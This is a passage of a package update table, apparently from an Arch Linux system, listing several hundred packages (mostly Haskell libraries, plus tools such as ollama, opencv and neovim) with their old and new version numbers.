                           git-delta             0.19.1-1             0.19.2-1
                          git-repair       1.20230814-189       1.20230814-190
                               gitit         0.15.1.2-121         0.15.1.2-127
                             glances              4.5.2-2              4.5.3-1
                               glirc            2.40.1-70            2.40.1-74
           globalprotect-openconnect              2.5.1-2              2.5.1-3
                                  gn    0.2324.304bbef6-1    0.2324.304bbef6-2
                      gnuradio-iqbal             0.38.3-2             0.38.3-3
                       golangci-lint             2.11.3-1             2.11.4-1
                         google-glog              0.7.1-1              0.7.1-2
                                grpc             1.78.1-2             1.80.0-1
                            grpc-cli             1.78.1-2             1.80.0-1
                                gvim           9.2.0204-2           9.2.0272-1
                              hamlib              4.6.5-3              4.7.0-1
                           hardinfo2             2.2.16-1             2.2.16-2
                 haskell-adjunctions            4.4.3-102              4.4.4-1
                       haskell-aeson            2.2.1.0-5            2.2.1.0-7
         haskell-aeson-better-errors           0.9.1.3-73           0.9.1.3-75
                haskell-aeson-casing          0.2.0.0-233          0.2.0.0-235
                  haskell-aeson-diff         1.1.0.13-267         1.1.0.13-269
                haskell-aeson-pretty           0.8.10-150           0.8.10-152
                    haskell-aeson-qq            0.8.4-335            0.8.4-337
        haskell-aeson-warning-parser             0.1.1-89             0.1.1-91
                  haskell-aeson-yaml          1.1.0.1-349          1.1.0.1-351
                haskell-apply-refact          0.14.0.0-63          0.14.0.0-64
                    haskell-arch-web             0.3.2-54             0.3.2-58
                    haskell-arithmoi          0.13.2.0-32          0.13.2.0-35
            haskell-attoparsec-aeson            2.2.0.0-7            2.2.0.0-9
                haskell-authenticate          1.3.5.2-250          1.3.5.2-253
          haskell-authenticate-oauth              1.7-373              1.7-375
                         haskell-aws             0.24.2-9            0.24.2-12
              haskell-binary-conduit            1.3.1-588            1.3.1-590
            haskell-binary-instances            1.0.4-161            1.0.4-163
               haskell-binary-tagged            0.3.1-332            0.3.1-334
                      haskell-bitvec           1.1.5.0-43           1.1.5.0-45
                  haskell-bower-json          1.1.0.0-229          1.1.0.0-231
                  haskell-breakpoint           0.1.4.0-20            0.1.5.0-1
                     haskell-butcher          1.3.3.2-508          1.3.3.2-510
                    haskell-bv-sized             1.0.6-96             1.0.6-99
                  haskell-byte-order          0.1.3.1-161          0.1.3.1-163
   haskell-bytestring-strict-builder           0.4.5.8-76           0.4.5.8-78
       haskell-cabal-install-parsers           0.6.1.1-12           0.6.1.1-16
                 haskell-casa-client             0.0.3-32             0.0.3-36
                  haskell-casa-types             0.0.3-24             0.0.3-27
                       haskell-cborg          0.2.10.0-86          0.2.10.0-88
                  haskell-cborg-json          0.2.6.0-101          0.2.6.0-103
                  haskell-cheapskate          0.1.1.2-861          0.1.1.2-864
                    haskell-checkers            0.6.0-257            0.6.0-258
                     haskell-chimera          0.4.1.0-144          0.4.1.0-146
                          haskell-ci            0.16.6-48            0.16.6-52
                    haskell-citeproc           0.8.1.1-84           0.8.1.1-86
                   haskell-clash-lib             1.8.2-97            1.8.2-100
               haskell-clash-prelude             1.8.2-89             1.8.2-92
              haskell-classy-prelude           1.5.0.3-81           1.5.0.3-84
                haskell-coinbase-pro          0.9.3.2-435          0.9.3.2-439
       haskell-commonmark-extensions            0.2.5.6-5            0.2.5.6-6
           haskell-commonmark-pandoc           0.2.2.3-46           0.2.2.3-48
                     haskell-concise          0.1.0.1-660          0.1.0.1-662
                     haskell-conduit          1.3.6.1-133          1.3.6.1-135
               haskell-conduit-extra             1.3.8-76             1.3.8-78
               haskell-conduit-parse          0.2.1.1-311          0.2.1.1-313
               haskell-config-schema          1.3.0.0-234          1.3.0.0-236
          haskell-constraints-extras           0.4.0.2-54           0.4.0.2-56
               haskell-contravariant              1.5.5-6              1.5.6-1
        haskell-contravariant-extras            0.3.5.4-6            0.3.5.4-7
                   haskell-criterion           1.6.3.0-47           1.6.3.0-49
       haskell-criterion-measurement           0.2.3.0-57           0.2.3.0-59
             haskell-crypton-conduit            0.2.3-219            0.2.3-221
          haskell-crypton-connection             0.4.5-26             0.4.5-28
          haskell-cryptonite-conduit            0.2.2-792            0.2.2-794
                         haskell-dav            1.3.4-874            1.3.4-879
                        haskell-dbus             1.3.3-73             1.3.3-76
               haskell-dbus-hslogger          0.1.0.1-676          0.1.0.1-679
              haskell-deferred-folds           0.9.18.8-2           0.9.18.8-4
        haskell-dense-linear-algebra          0.1.0.0-444          0.1.0.0-446
               haskell-dependent-map            0.4.0.1-9           0.4.0.1-11
               haskell-dependent-sum          0.7.2.0-219          0.7.2.0-221
      haskell-dependent-sum-template           0.2.0.2-17           0.2.0.2-19
                       haskell-deque          0.4.4.2-114          0.4.4.2-116
              haskell-deriving-aeson           0.2.10-131           0.2.10-133
                      haskell-docopt          0.7.0.8-151          0.7.0.8-153
                haskell-doctemplates          0.11.0.1-76          0.11.0.1-78
            haskell-doctest-discover          0.2.0.0-213          0.2.0.0-215
                      haskell-either             5.0.3-79             5.0.3-80
                  haskell-enummapset          0.7.3.0-139          0.7.3.0-141
                   haskell-esqueleto           3.5.11.0-8           3.5.11.1-4
                  haskell-fdo-notify            0.3.1-922            0.3.1-925
                        haskell-feed          1.3.2.1-330          1.3.2.1-332
                    haskell-floskell           0.10.8-189           0.10.8-191
                       haskell-focus          1.0.3.2-186          1.0.3.2-188
                       haskell-foldl            1.4.18-93            1.4.18-94
                    haskell-fourmolu           0.13.1.0-5           0.14.0.0-2
                        haskell-free              5.2-124              5.2-125
                    haskell-fsnotify           0.4.4.0-40           0.4.4.0-42
                haskell-generic-data           1.1.0.2-66           1.1.0.2-68
                haskell-generic-lens          2.2.2.0-200          2.2.2.0-202
                   haskell-ghc-check          0.5.0.8-150          0.5.0.8-151
              haskell-ghc-exactprint            1.7.1.0-9           1.7.1.0-10
                      haskell-ghcide           2.2.0.0-16            2.3.0.0-5
           haskell-ghcide-test-utils          1.9.0.0-292          1.9.0.0-299
                          haskell-gi           0.26.16-10           0.26.16-12
                      haskell-gi-atk            2.0.28-38            2.0.28-40
                    haskell-gi-cairo            1.0.30-31            1.0.30-33
          haskell-gi-cairo-connector            0.1.1-313            0.1.1-315
                 haskell-gi-dbusmenu            0.4.14-33            0.4.14-35
             haskell-gi-dbusmenugtk3           0.4.15-130           0.4.15-132
                haskell-gi-freetype2             2.0.5-41             2.0.5-43
                      haskell-gi-gdk            4.0.9-106            4.0.9-108
                     haskell-gi-gdk3            3.0.29-30            3.0.29-32
                  haskell-gi-gdk3x11             3.0.15-6             3.0.16-1
                haskell-gi-gdkpixbuf           2.0.32-142           2.0.32-144
                   haskell-gi-gdkx11            4.0.8-129            4.0.8-131
                      haskell-gi-gio            2.0.38-25            2.0.38-27
                     haskell-gi-glib            2.0.30-59            2.0.30-61
                  haskell-gi-gmodule             2.0.6-43             2.0.6-45
                  haskell-gi-gobject            2.0.31-75            2.0.31-77
                 haskell-gi-graphene             1.0.8-68             1.0.8-70
                      haskell-gi-gsk             4.0.8-55             4.0.8-57
                      haskell-gi-gtk            4.0.11-32            4.0.11-34
                   haskell-gi-gtk-hs           0.3.17-101           0.3.17-103
                     haskell-gi-gtk3            3.0.43-13            3.0.43-15
                 haskell-gi-harfbuzz           0.0.10-147           0.0.10-149
                    haskell-gi-pango            1.0.30-36            1.0.30-38
                     haskell-gi-xlib            2.0.14-93            2.0.14-95
                     haskell-git-lfs             1.2.5-78             1.2.5-81
                     haskell-githash          0.1.6.3-345          0.1.6.3-348
                haskell-gtk-sni-tray          0.1.8.1-394          0.1.8.1-397
                   haskell-gtk-strut          0.1.3.2-348          0.1.3.2-350
                  haskell-hackage-db            2.1.3-191            2.1.3-193
            haskell-hackage-security           0.6.3.2-13           0.6.3.2-15
             haskell-haddock-library           1.11.0-184           1.11.0-188
                     haskell-hadrian     0.1.0.0+9.6.6-16     0.1.0.0+9.6.6-19
                      haskell-hakyll          4.16.4.0-25          4.16.4.0-31
            haskell-happstack-server             7.9.3-24             7.9.3-25
                       haskell-hasql          1.5.0.5-114            1.6.1.1-2
    haskell-hasql-dynamic-statements          0.3.1.1-280            0.3.1.2-2
             haskell-hasql-implicits          0.1.0.5-316          0.1.0.5-320
         haskell-hasql-notifications           0.2.0.5-89           0.2.0.5-93
                  haskell-hasql-pool          0.5.2.2-399            0.8.0.2-2
           haskell-hasql-transaction          1.0.1.1-421            1.0.1.2-2
            haskell-hedgehog-classes          0.2.5.4-216          0.2.5.4-218
                        haskell-here           1.2.14-135           1.2.14-136
                    haskell-hie-bios           0.12.0-159           0.12.0-161
                 haskell-hledger-lib               1.52-6               1.52-8
haskell-hls-alternate-number-format-plugin     2.2.0.0-16            2.3.0.0-5
        haskell-hls-cabal-fmt-plugin           2.2.0.0-16            2.3.0.0-5
            haskell-hls-cabal-plugin           2.2.0.0-16            2.3.0.0-5
   haskell-hls-call-hierarchy-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-change-type-signature-plugin       2.2.0.0-16            2.3.0.0-5
            haskell-hls-class-plugin           2.2.0.0-16            2.3.0.0-5
       haskell-hls-code-range-plugin           2.2.0.0-16            2.3.0.0-5
             haskell-hls-eval-plugin           2.2.0.0-16            2.3.0.0-5
  haskell-hls-explicit-fixity-plugin           2.2.0.0-16            2.3.0.0-5
 haskell-hls-explicit-imports-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-explicit-record-fields-plugin      2.2.0.0-16            2.3.0.0-5
         haskell-hls-floskell-plugin           2.2.0.0-16            2.3.0.0-5
         haskell-hls-fourmolu-plugin           2.2.0.0-17            2.3.0.0-5
             haskell-hls-gadt-plugin           2.2.0.0-17            2.3.0.0-5
                   haskell-hls-graph           2.2.0.0-12            2.3.0.0-4
            haskell-hls-hlint-plugin           2.2.0.0-16            2.3.0.0-5
      haskell-hls-module-name-plugin           2.2.0.0-16            2.3.0.0-5
           haskell-hls-ormolu-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-overloaded-record-dot-plugin       2.2.0.0-16            2.3.0.0-5
              haskell-hls-plugin-api           2.2.0.0-15            2.3.0.0-4
          haskell-hls-pragmas-plugin           2.2.0.0-16            2.3.0.0-5
haskell-hls-qualify-imported-names-plugin      2.2.0.0-16            2.3.0.0-5
         haskell-hls-refactor-plugin           2.2.0.0-17            2.3.0.0-5
           haskell-hls-rename-plugin           2.2.0.0-17            2.3.0.0-5
           haskell-hls-retrie-plugin           2.2.0.0-17            2.3.0.0-5
           haskell-hls-splice-plugin           2.2.0.0-17            2.3.0.0-5
  haskell-hls-stylish-haskell-plugin           2.2.0.0-16            2.3.0.0-5
              haskell-hls-test-utils           2.2.0.0-16            2.3.0.0-5
                     haskell-hoauth2            2.14.0-16            2.14.0-19
                    haskell-hopenpgp           2.10.1-121           2.10.1-124
                       haskell-hpack            0.38.0-21            0.38.0-24
                       haskell-hslua            2.3.0-203            2.3.0-206
                 haskell-hslua-aeson           2.3.1.1-51           2.3.1.1-54
               haskell-hslua-classes             2.3.1-30             2.3.1-31
                  haskell-hslua-core             2.3.2-34             2.3.2-35
                  haskell-hslua-list             1.1.4-29             1.1.4-30
           haskell-hslua-marshalling            2.3.1-141            2.3.1-142
      haskell-hslua-module-doclayout             1.2.0-11             1.2.0-14
           haskell-hslua-module-path            1.1.1-105            1.1.1-108
         haskell-hslua-module-system             1.1.2-54             1.1.2-55
           haskell-hslua-module-text          1.1.0.1-168          1.1.0.1-169
        haskell-hslua-module-version            1.1.1-147            1.1.1-150
            haskell-hslua-module-zip             1.1.3-47             1.1.3-48
     haskell-hslua-objectorientation             2.3.1-49             2.3.1-50
             haskell-hslua-packaging            2.3.1-151            2.3.1-152
                  haskell-hslua-repl            0.1.2-147            0.1.2-148
                haskell-hslua-typing            0.1.1-143            0.1.1-144
                   haskell-hspec-wai           0.11.1-639           0.11.1-642
              haskell-hspec-wai-json           0.11.0-710           0.11.0-713
                haskell-hsyaml-aeson           0.2.0.2-58           0.2.0.2-60
                         haskell-htf          0.15.0.2-68          0.15.0.2-70
                haskell-html-conduit          1.3.2.2-388          1.3.2.2-390
                        haskell-http         4000.4.1-398         4000.4.1-401
                 haskell-http-client            0.7.19-58            0.7.19-60
      haskell-http-client-restricted            0.1.0-198            0.1.0-201
             haskell-http-client-tls          0.3.6.4-137          0.3.6.4-140
                haskell-http-conduit          2.3.9.1-197          2.3.9.1-200
               haskell-http-download          0.2.1.0-327          0.2.1.0-330
                haskell-http-streams          0.8.9.9-292          0.8.9.9-295
                       haskell-http2             5.1.0-17             5.1.0-19
                       haskell-http3             0.0.9-21             0.0.9-23
                  haskell-httpd-shed          0.4.1.2-108          0.4.1.2-109
               haskell-hw-fingertree          0.1.2.1-194          0.1.2.1-196
           haskell-hw-hspec-hedgehog          0.1.1.1-213          0.1.1.1-215
                     haskell-hw-prim          0.6.3.2-213          0.6.3.2-215
                         haskell-hxt         9.3.1.22-234         9.3.1.22-235
                haskell-implicit-hie           0.1.4.0-78           0.1.4.0-80
         haskell-implicit-hie-cradle          0.5.0.1-192          0.5.0.1-194
          haskell-incremental-parser            0.5.1-166            0.5.1-167
   haskell-insert-ordered-containers          0.2.5.3-200          0.2.5.3-203
                 haskell-interpolate            0.2.1-468            0.2.1-469
    haskell-interpolatedstring-perl6            1.0.2-405            1.0.2-406
                   haskell-invariant             0.6.4-94             0.6.4-95
                       haskell-ipynb              0.2-283              0.2-285
              haskell-ipython-kernel           0.12.0.0-8          0.12.0.0-10
           haskell-isomorphism-class             0.1.1-92             0.1.1-94
                 haskell-ixset-typed          0.5.1.0-314          0.5.1.0-316
                        haskell-jose             0.10-256             0.10-259
                   haskell-js-jquery            3.7.1-107            3.7.1-110
              haskell-kan-extensions             5.2.7-85             5.2.7-87
                        haskell-keys             3.12.5-5             3.12.5-6
                    haskell-kvitable            1.1.1.1-7           1.1.1.1-10
           haskell-lambdabot-trusted          5.3.1.2-244          5.3.1.2-247
                  haskell-lambdahack         0.11.0.1-190         0.11.0.1-193
             haskell-language-server           2.2.0.0-19            2.3.0.0-5
                    haskell-lattices             2.2.1-96             2.2.1-97
                        haskell-lens              5.3.4-1              5.3.4-3
                 haskell-lens-action            0.2.6-329            0.2.6-331
                  haskell-lens-aeson            1.2.3-202            1.2.3-205
                     haskell-libyaml            0.1.4-161            0.1.4-163
                      haskell-linear            1.23.2-47            1.23.2-49
                      haskell-list-t           1.0.5.7-63           1.0.5.7-65
                    haskell-lrucache           1.2.0.1-26           1.2.0.1-27
                         haskell-lsp           2.2.0.0-10           2.2.0.0-13
                    haskell-lsp-test          0.16.0.0-11          0.16.0.0-14
                   haskell-lsp-types            2.0.2.0-9           2.0.2.0-12
               haskell-lua-arbitrary          1.0.1.1-135            1.0.1.2-1
                  haskell-lumberjack          1.0.3.0-172          1.0.3.0-173
                  haskell-microaeson           0.1.0.3-43           0.1.0.3-45
             haskell-microlens-aeson            2.5.2-151            2.5.2-153
                 haskell-microstache          1.0.2.3-212          1.0.2.3-214
                  haskell-mime-types            0.1.2.0-4            0.1.2.1-1
                       haskell-mmark          0.0.7.6-346          0.0.7.6-348
                         haskell-mod           0.2.1.0-30           0.2.1.0-32
                  haskell-modern-uri          0.3.6.1-147          0.3.6.1-148
              haskell-monad-dijkstra          0.1.1.5-193          0.1.1.5-195
                haskell-monad-logger           0.3.42-113           0.3.42-115
            haskell-mono-traversable         1.0.21.0-135         1.0.21.0-137
  haskell-mono-traversable-instances          0.1.1.0-386          0.1.1.0-389
                    haskell-mustache           2.4.3.1-72           2.4.3.1-76
          haskell-mutable-containers          0.3.4.1-242          0.3.4.1-244
                  haskell-named-text           1.2.2.0-13           1.2.2.0-16
          haskell-neat-interpolation          0.5.1.4-199          0.5.1.4-201
                 haskell-network-uri          2.6.4.2-137          2.6.4.2-138
                        haskell-oeis           0.3.10.2-6           0.3.10.2-9
                   haskell-one-liner              2.1.1-2              2.1.1-3
             haskell-optparse-simple          0.1.1.4-535          0.1.1.4-538
                      haskell-ormolu           0.6.0.0-13           0.6.0.0-15
                       haskell-pager          0.1.1.0-218          0.1.1.0-220
                      haskell-pandoc               3.5-12                3.6-2
           haskell-pandoc-lua-engine             0.3.3-14                0.4-2
          haskell-pandoc-lua-marshal             0.2.9-15              0.3.0-1
               haskell-pandoc-server           0.1.0.10-3           0.1.0.10-9
                haskell-pandoc-types           1.23.1-164           1.23.1-166
                      haskell-pantry           0.8.2.2-32           0.8.2.2-36
         haskell-parameterized-utils           2.1.11.0-9          2.1.11.0-12
                        haskell-path              0.9.6-9             0.9.6-11
                     haskell-path-io            1.8.2-140            1.8.2-142
                  haskell-persistent          2.14.5.2-58          2.14.5.2-61
            haskell-persistent-mysql         2.13.1.5-100         2.13.1.5-103
       haskell-persistent-postgresql          2.13.5.2-24          2.13.5.2-27
               haskell-persistent-qq          2.12.0.7-73          2.12.0.7-76
           haskell-persistent-sqlite          2.13.1.1-66          2.13.1.1-69
             haskell-persistent-test         2.13.1.3-208         2.13.1.3-211
                  haskell-pipes-http            1.0.6-770            1.0.6-773
                     haskell-pointed            5.0.5-125            5.0.5-127
           haskell-postgresql-binary           0.12.5-267           0.12.5-270
           haskell-postgresql-simple          0.6.5.1-112          0.6.5.1-114
        haskell-prettyprinter-interp          0.2.0.0-157          0.2.0.0-158
                   haskell-prim-uniq              0.2-250              0.2-252
            haskell-primitive-extras         0.10.2.2-131         0.10.2.2-134
                 haskell-profunctors             5.6.3-82             5.6.3-83
            haskell-project-template          0.2.1.0-508          0.2.1.0-510
                         haskell-ptr         0.16.8.7-128         0.16.8.7-130
                        haskell-quic             0.1.27-3             0.1.27-5
          haskell-quickcheck-classes          0.6.5.0-342          0.6.5.0-344
                         haskell-ral             0.2.2-54             0.2.2-56
                      haskell-rebase            1.20.2-14            1.20.2-16
                   haskell-recaptcha          0.1.0.4-379          0.1.0.4-382
           haskell-recursion-schemes            5.2.3-141            5.2.3-142
                    haskell-reducers           3.12.5-125           3.12.5-126
                    haskell-refinery          0.4.0.0-317          0.4.0.0-318
                         haskell-req            3.13.4-32            3.13.4-35
                        haskell-rere           0.2.0.2-13           0.2.0.2-15
                    haskell-rerebase            1.20.2-14            1.20.2-16
                      haskell-retrie            1.2.3-159            1.2.3-161
                 haskell-rio-orphans          0.1.2.0-486          0.1.2.0-488
             haskell-rio-prettyprint           0.1.8.0-69           0.1.8.0-71
                   haskell-row-types           1.0.1.2-66           1.0.1.2-68
                    haskell-safecopy          0.10.4.3-57          0.10.4.3-59
                       haskell-sandi              0.5-597              0.5-599
                    haskell-sandwich           0.2.2.0-20           0.2.2.0-22
                      haskell-scotty             0.22-203             0.22-206
                        haskell-sdl2          2.5.5.1-128          2.5.5.1-131
                    haskell-sdl2-ttf            2.1.3-278            2.1.3-281
                   haskell-semialign             1.3.1-58             1.3.1-59
               haskell-semigroupoids              6.0.2-3              6.0.2-4
                   haskell-serialise          0.2.6.1-174          0.2.6.1-176
                     haskell-servant          0.20.3.0-52          0.20.3.0-54
              haskell-servant-client          0.20.3.0-67          0.20.3.0-71
         haskell-servant-client-core          0.20.3.0-52          0.20.3.0-54
              haskell-servant-server          0.20.3.0-67          0.20.3.0-70
             haskell-servant-swagger            1.2.1-153            1.2.1-156
                       haskell-shake           0.19.6-387           0.19.6-390
                 haskell-shakespeare             2.1.7-14            2.1.7.1-2
             haskell-simple-sendfile           0.2.32-196           0.2.32-198
                 haskell-skylighting             0.14.4-3             0.14.4-5
            haskell-skylighting-core             0.14.4-3             0.14.4-5
     haskell-skylighting-format-ansi              0.1-293              0.1-295
haskell-skylighting-format-blaze-html         0.1.1.3-147          0.1.1.3-149
  haskell-skylighting-format-context          0.1.0.2-257          0.1.0.2-259
    haskell-skylighting-format-latex              0.1-292              0.1-294
                   haskell-snap-core          1.0.5.1-210          1.0.5.1-211
                 haskell-snap-server          1.1.2.1-362          1.1.2.1-365
                   haskell-sourcemap            0.1.7-299            0.1.7-301
                    haskell-src-meta            0.8.15-90            0.8.15-91
                  haskell-statistics           0.16.4.0-9          0.16.4.0-11
        haskell-status-notifier-item            0.3.2.0-2            0.3.2.0-5
              haskell-stm-containers          1.2.1.1-160          1.2.1.1-164
                    haskell-stm-hamt          1.2.1.1-132              1.2.2-3
                       haskell-store           0.7.20-137           0.7.20-139
                     haskell-streams            3.3.3-125            3.3.3-127
                 haskell-strict-list          0.1.7.6-132          0.1.7.6-134
          haskell-string-interpolate          0.3.4.0-143          0.3.4.0-144
                  haskell-structured            0.1.1-319            0.1.1-321
                    haskell-summoner            2.1.0.0-2            2.1.0.0-6
                haskell-summoner-tui            2.1.0.0-2            2.1.0.0-6
                    haskell-swagger2            2.8.10-98           2.8.10-101
           haskell-tagstream-conduit            0.5.6-536            0.5.6-538
haskell-tamarin-prover-accountability            1.12.0-6             1.12.0-8
       haskell-tamarin-prover-export             1.12.0-6             1.12.0-8
        haskell-tamarin-prover-sapic             1.12.0-6             1.12.0-8
         haskell-tamarin-prover-term             1.12.0-6             1.12.0-8
       haskell-tamarin-prover-theory             1.12.0-6             1.12.0-8
        haskell-tamarin-prover-utils             1.12.0-6             1.12.0-8
                 haskell-tar-conduit            0.4.1-191            0.4.1-193
             haskell-tasty-checklist           1.0.8.0-10           1.0.8.0-13
                 haskell-tasty-hslua            1.1.1-139            1.1.1-140
                   haskell-tasty-lua           1.1.1.1-72           1.1.1.1-73
                 haskell-tasty-sugar           2.2.2.1-85           2.2.2.1-88
                     haskell-tdigest            0.3.1-150            0.3.1-152
                     haskell-texmath         0.12.8.11-15          0.12.8.12-1
                haskell-text-builder            0.6.7-283            0.6.7-285
            haskell-text-builder-dev          0.3.3.2-244          0.3.3.2-246
                   haskell-th-compat             0.1.6-87              0.1.7-1
                  haskell-th-desugar               1.16-3               1.16-4
                      haskell-th-env            0.1.1-164            0.1.1-165
                  haskell-th-orphans            0.13.17-4            0.13.17-5
                haskell-th-utilities          0.2.5.2-102          0.2.5.2-103
                         haskell-tls             2.0.6-71             2.0.6-73
         haskell-tls-session-manager             0.0.6-21             0.0.6-23
                   haskell-tree-diff          0.3.0.1-229              0.3.1-3
                    haskell-trifecta            2.1.4-174            2.1.4-176
                      haskell-turtle            1.6.2-161            1.6.2-162
                       haskell-typst               0.6-19              0.6.1-1
               haskell-typst-symbols              0.1.6-2              0.1.7-1
        haskell-uri-bytestring-aeson          0.1.0.9-133          0.1.0.9-135
                  haskell-uri-encode          1.5.0.7-319          1.5.0.7-320
                         haskell-vec             0.5.1-52             0.5.1-54
           haskell-vector-algorithms          0.9.1.0-123          0.9.1.0-125
              haskell-vector-builder          0.3.8.6-139          0.3.8.6-141
            haskell-vector-instances             3.4.3-77             3.4.3-79
                haskell-vector-sized            1.6.1-155            1.6.1-157
            haskell-wai-app-file-cgi            3.1.11-20            3.1.11-23
              haskell-wai-app-static            3.1.9-233            3.1.9-236
                 haskell-wai-conduit          3.0.0.4-714          3.0.0.4-716
                   haskell-wai-extra            3.1.18-41            3.1.18-44
          haskell-wai-handler-launch          3.0.3.1-811          3.0.3.1-814
             haskell-wai-http2-extra            0.1.3-376            0.1.3-379
       haskell-wai-middleware-static            0.9.3-192            0.9.3-195
                        haskell-warp             3.4.0-19             3.4.0-22
                   haskell-warp-quic            0.0.0-435            0.0.0-438
                    haskell-warp-tls            3.4.9-191            3.4.9-194
                       haskell-weigh           0.0.18-122           0.0.18-124
                       haskell-what4               1.6-78               1.6-81
                   haskell-wide-word           0.1.8.1-33           0.1.8.1-35
                   haskell-with-utf8          1.1.0.0-131          1.1.0.0-132
            haskell-wl-pprint-extras          3.5.0.5-560          3.5.0.5-561
          haskell-wl-pprint-terminfo          3.7.1.4-560          3.7.1.4-561
                        haskell-wreq            0.5.4.4-3            0.5.4.4-7
                        haskell-wuss           2.0.1.6-31           2.0.1.6-33
                      haskell-xcffib             1.6.1-14             1.6.1-15
           haskell-xdg-desktop-entry            0.1.1.3-2            0.1.1.3-3
                 haskell-xml-conduit          1.9.1.4-150          1.9.1.4-152
                  haskell-xml-hamlet            0.5.0.3-8           0.5.0.3-11
                      haskell-xmlgen          0.6.2.2-191          0.6.2.2-192
                haskell-xss-sanitize          0.3.7.2-131          0.3.7.2-132
                        haskell-yaml        0.11.11.2-205        0.11.11.2-207
                       haskell-yesod          1.6.2.1-460          1.6.2.1-464
                  haskell-yesod-auth         1.6.11.3-282         1.6.11.3-286
                  haskell-yesod-core         1.6.27.1-115         1.6.27.1-119
                  haskell-yesod-form            1.7.9.2-2            1.7.9.2-6
            haskell-yesod-persistent          1.6.0.8-520          1.6.0.8-524
                haskell-yesod-static          1.6.1.0-979          1.6.1.0-983
                  haskell-yesod-test           1.6.23-134           1.6.23-138
                           hedgewars             1.0.3-19             1.0.3-21
                               hefur               1.0-35               1.0-36
                               hepmc              3.3.1-7              3.3.1-8
                          hepmc-docs              3.3.1-7              3.3.1-8
                             hindent              6.1.1-6              6.1.1-8
                               hiprt      3.1.0.cb09c56-2      3.1.0.cb09c56-3
                             hledger               1.52-6              1.52-10
                        hledger-iadd            1.3.22-17            1.3.22-19
                          hledger-ui               1.52-7              1.52-11
                         hledger-web              1.52-10              1.52-14
                               hlint              3.6.1-8             3.6.1-10
                              hoogle         5.0.18.4-265         5.0.18.4-268
                      hopenpgp-tools           0.23.11-40           0.23.11-44
              hsa-amd-aqlprofile-bin              7.1.0-1              7.1.0-2
                           hslua-cli             1.4.3-87             1.4.3-88
                       i3status-rust             0.36.0-1             0.36.1-1
                               iaito              5.9.9-1              6.1.2-1
                      ibus-libpinyin             1.16.0-4             1.16.1-1
                               idris            1.3.4-478            1.3.4-481
                            ihaskell           0.13.0.0-9          0.13.0.0-12
                               incus             6.22.0-1             6.23.0-1
                         incus-tools             6.22.0-1             6.23.0-1
                              jasper              4.2.8-1              4.2.9-1
                          jasper-doc              4.2.8-1              4.2.9-1
                     jellyfin-ffmpeg          1:7.1.3p3-2          1:7.1.3p4-1
                                jolt              1.2.0-2              1.2.0-3
                               kicad             10.0.0-1             10.0.0-2
                          kitinerary            25.12.3-2            25.12.3-3
                              kmonad             0.4.4-89             0.4.4-91
                       kosmindoormap            25.12.3-1            25.12.3-2
                   libedataserverui4             3.58.3-1             3.58.3-2
                               libhx                5.3-1                5.4-1
              libperconaserverclient            8.4.8_8-1            8.4.8_8-2
                      libphonenumber           1:9.0.27-1           1:9.0.27-2
                            libsbsms              2.3.0-5              2.3.0-6
                           libsigrok             0.5.2-25             0.5.2-26
                           libtg_owt    0.git33.26068e2-1    0.git33.26068e2-2
                              libvlc             3.0.22-1             3.0.22-2
                              libvpx             1.16.0-2             1.16.0-3
                      libwireplumber             0.5.13-2             0.5.14-1
                              libwmf             0.2.13-4             0.2.14-1
                              libxdp              1.6.2-1              1.6.3-1
                          lincity-ng             2.14.2-2             2.14.2-3
                           lostfiles               4.14-1               4.15-1
                        lua-luarocks             3.13.0-4             3.13.0-5
                      lua51-luarocks             3.13.0-4             3.13.0-5
                      lua52-luarocks             3.13.0-4             3.13.0-5
                      lua53-luarocks             3.13.0-4             3.13.0-5
                      lua54-luarocks             3.13.0-4             3.13.0-5
                              luajit2.1.1774638290+fbb36bb-12.1.1774896198+18b087c-1
                            luarocks             3.13.0-4             3.13.0-5
                                mako             1.10.0-1             1.11.0-1
                              marble            25.12.3-1            25.12.3-2
                       marble-behaim            25.12.3-1            25.12.3-2
                       marble-common            25.12.3-1            25.12.3-2
                         marble-maps            25.12.3-1            25.12.3-2
                           marble-qt            25.12.3-1            25.12.3-2
                              maxima             5.49.0-7             5.49.0-8
                          maxima-ecl             5.49.0-7             5.49.0-8
                          maxima-fas             5.49.0-7             5.49.0-8
                         maxima-sbcl             5.49.0-7             5.49.0-8
                             melange             0.46.1-1             0.47.0-1
                          merkaartor            0.20.0-20            0.20.0-21
                               mgard              1.6.0-5              1.6.0-6
                           mighttpd2             4.0.4-25             4.0.4-28
                            migraphx              7.2.0-1              7.2.0-2
                           miniupnpd              2.3.9-2             2.3.10-1
                                mise           2026.3.8-1          2026.3.17-1
                               mixxx              2.5.4-2              2.5.4-3
                     mkdocs-material              9.7.5-1              9.7.6-1
                                moor             2.11.1-1             2.12.0-1
                                mosh             1.4.0-28             1.4.0-29
                           mosquitto             2.0.22-2              2.1.2-1
                              mumble            1.5.857-5            1.5.857-6
                       mumble-server            1.5.857-5            1.5.857-6
                              nageru              2.3.2-2              2.3.2-3
                                ncnn           20260113-3           20260113-4
                               ndctl                 82-1                 83-1
                             neovide             0.15.2-2             0.16.0-1
                              neovim             0.11.6-1             0.11.7-1
                             netdata              2.9.0-1              2.9.0-2
               netfilter-fullconenat      r73.0cf3b48-503      r73.0cf3b48-504
                    nextcloud-client           2:33.0.0-1           2:33.0.1-1
                             ngspice               45.2-2                 46-1
                              nickel             1.16.0-2             1.16.0-3
                         nickel-docs             1.16.0-2             1.16.0-3
              nickel-language-server             1.16.0-2             1.16.0-3
                         nodejs-yaml              2.3.1-1              2.3.2-1
                   npm-check-updates             19.5.0-1             19.6.0-1
                                nrpe              4.1.1-1              4.1.2-1
                              nsjail               3.4-22               3.4-23
                              ollama             0.18.3-1             0.19.0-1
                         ollama-cuda             0.18.3-1             0.19.0-1
                         ollama-docs             0.18.3-1             0.19.0-1
                         ollama-rocm             0.18.3-1             0.19.0-1
                       ollama-vulkan             0.18.3-1             0.19.0-1
                                onnx           1:1.20.1-1           1:1.20.1-2
                     onnxruntime-cpu             1.24.4-3             1.24.4-4
                    onnxruntime-cuda             1.24.4-3             1.24.4-4
                onnxruntime-opt-cuda             1.24.4-3             1.24.4-4
                onnxruntime-opt-rocm             1.24.4-3             1.24.4-4
                    onnxruntime-rocm             1.24.4-3             1.24.4-4
                   open-policy-agent             1.15.0-1             1.15.1-1
                            opencode              1.3.3-1              1.3.8-1
                              opencv             4.13.0-3             4.13.0-4
                         opencv-cuda             4.13.0-3             4.13.0-4
                      opencv-samples             4.13.0-3             4.13.0-4
